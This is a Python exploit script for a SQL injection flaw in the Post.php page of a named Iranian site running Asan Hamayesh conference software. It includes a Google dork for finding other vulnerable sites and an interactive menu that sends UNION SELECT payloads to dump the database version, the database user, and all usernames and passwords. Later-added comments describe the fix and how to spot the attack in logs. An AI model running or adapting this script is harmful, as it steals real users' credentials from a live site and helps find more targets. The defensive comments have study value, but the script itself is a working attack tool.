#!/usr/bin/python3
################################################
# Title: Zaheb.ir | SQL Injection
# Date: 2019-07-23
# Google Dork: intext:طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس)
# Exploit Author: D3trct0r
# Vendor Homepage: http://asanhamayesh.com
# Tested on: GNU/Linux, Windows, FreeBSD, Android
# CWE : CWE-89
################################################
import requests
from bs4 import BeautifulSoup
# Interactive proof-of-concept for a CWE-89 (SQL injection) finding in Post.php.
# Each command below issues one HTTP GET whose `id` query parameter carries a
# 19-column UNION SELECT against the `users` table; the expression in column 4
# is the value the page reflects back inside its first `div.post-short`.
# NOTE(review): the payload working at all implies `id` reaches the SQL
# statement without parameter binding or integer casting; the server code is
# not shown here, so confirm against the application source.
# Defender view:
#   - Fix: bind `id` as a prepared-statement parameter (or cast it to an
#     integer) before it reaches the query.
#   - Detection: these are plain GET requests, so the payload appears in web
#     access logs as `union+select`, `group_concat` or `unhex(hex(` inside the
#     `id` query string of Post.php, together with a negative id value.
#   - Exposure: the last three commands read the UserName and PassWord columns,
#     so credentials in `users` should be treated as disclosed and rotated.
#     SOURCE does not show whether PassWord holds plaintext or hashes.
try:
# Banner; \033[31m is the ANSI escape for red foreground text.
print ('''\033[31m
███████╗ █████╗ ██╗ ██╗███████╗██████╗ ██╗██████╗
╚══███╔╝██╔══██╗██║ ██║██╔════╝██╔══██╗ ██║██╔══██╗
███╔╝ ███████║███████║█████╗ ██████╔╝ ██║██████╔╝
███╔╝ ██╔══██║██╔══██║██╔══╝ ██╔══██╗ ██║██╔══██╗
███████╗██║ ██║██║ ██║███████╗██████╔╝██╗██║██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝╚═╝ ╚═╝
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
Enter 'help' to show commands
''')
# Command loop: read one command per iteration until 'exit'.
while True:
opt = input ("[root@Zaheb Exploit]# ")
if opt == 'help' :
# List the accepted commands.
print ('''
version
database
userdb
usernames
passwords
userpass
exit
''')
# Every branch from here to 'userpass' is the same request/parse/print
# sequence; only the expression placed in column 4 of the UNION differs.
elif opt == 'version':
# Column 4 selects version().
payload = "+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
# presumably the negative id matches no post, so only the UNION row is rendered
url = "http://zaheb.ir/Post.php?id=-917"
up = (url+payload)
# Plain-HTTP GET; no timeout argument is passed to requests.get.
r = requests.get(up)
html = BeautifulSoup(r.content,'html.parser')
data = html.find_all('div',attrs={'class':'post-short'})
# Prints each child node of the first match; data[0] raises IndexError
# if the response contains no div.post-short.
for i in data[0]:
print('\033[31m ' ,i)
elif opt == 'database':
# Column 4 selects database().
payload = "+union+select+1,2,3,database(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
url = "http://zaheb.ir/Post.php?id=-917"
up = (url+payload)
r = requests.get(up)
html = BeautifulSoup(r.content,'html.parser')
data = html.find_all('div',attrs={'class':'post-short'})
for i in data[0]:
print('\033[31m ' ,i)
elif opt == 'userdb':
# Column 4 selects user(), the account the application connects to the
# database as. Defender note: that account should hold only the privileges
# the application needs.
payload = "+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
url = "http://zaheb.ir/Post.php?id=-917"
up = (url+payload)
r = requests.get(up)
html = BeautifulSoup(r.content,'html.parser')
data = html.find_all('div',attrs={'class':'post-short'})
for i in data[0]:
print('\033[31m ' ,i)
elif opt == 'usernames':
# Column 4 is group_concat(UserName) wrapped in unhex(hex(...)): all values
# of the UserName column of `users` come back in one field.
payload = "+union+select+1,2,3,unhex(hex(group_concat(UserName))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
url = "http://zaheb.ir/Post.php?id=-917"
up = (url+payload)
r = requests.get(up)
html = BeautifulSoup(r.content,'html.parser')
data = html.find_all('div',attrs={'class':'post-short'})
for i in data[0]:
print('\033[31m ' ,i)
elif opt == 'passwords':
# Same shape as 'usernames', reading the PassWord column instead.
# Defender note: storing passwords only as salted, slow hashes limits what
# a read of this column discloses.
payload = "+union+select+1,2,3,unhex(hex(group_concat(PassWord))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
url = "http://zaheb.ir/Post.php?id=-917"
up = (url+payload)
r = requests.get(up)
html = BeautifulSoup(r.content,'html.parser')
data = html.find_all('div',attrs={'class':'post-short'})
for i in data[0]:
print('\033[31m ' ,i)
elif opt == 'userpass':
# Both columns joined per row; 0x3a is the ':' separator.
payload = "+union+select+1,2,3,unhex(hex(group_concat(UserName,0x3a,PassWord))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users--+"
url = "http://zaheb.ir/Post.php?id=-917"
up = (url+payload)
r = requests.get(up)
html = BeautifulSoup(r.content,'html.parser')
data = html.find_all('div',attrs={'class':'post-short'})
for i in data[0]:
print('\033[31m ' ,i)
elif opt == 'exit':
# quit() raises SystemExit, which the SystemError handler below does not catch.
quit()
else:
print ("EXP:",opt,"Command Not Found")
# NOTE(review): requests reports network failures with its own exception
# classes, not SystemError, so this handler does not match what its message
# describes.
except SystemError:
print ("Please Check Internet....")